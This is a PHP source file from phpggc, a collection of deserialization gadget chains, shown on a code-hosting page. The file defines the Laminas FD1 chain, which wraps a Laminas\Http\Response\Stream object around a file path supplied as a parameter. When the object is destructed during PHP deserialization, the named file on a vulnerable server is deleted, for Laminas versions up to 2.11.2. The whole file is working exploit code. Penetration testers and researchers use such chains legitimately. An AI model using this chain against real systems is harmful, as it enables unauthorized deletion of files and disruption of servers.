Codebase list phpggc / 9a88393 gadgetchains / Laminas / FD / 1 / chain.php
9a88393

Tree @9a88393 (Download .tar.gz)

chain.php @9a88393raw · history · blame

<?php

namespace GadgetChain\Laminas;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '<= 2.11.2';
    public static $vector = '__destruct';
    public static $author = 'MrTuxracer';

    public function generate(array $parameters)
    {
        $remote_file = $parameters["remote_file"];

        return new \Laminas\Http\Response\Stream($remote_file);
    }
}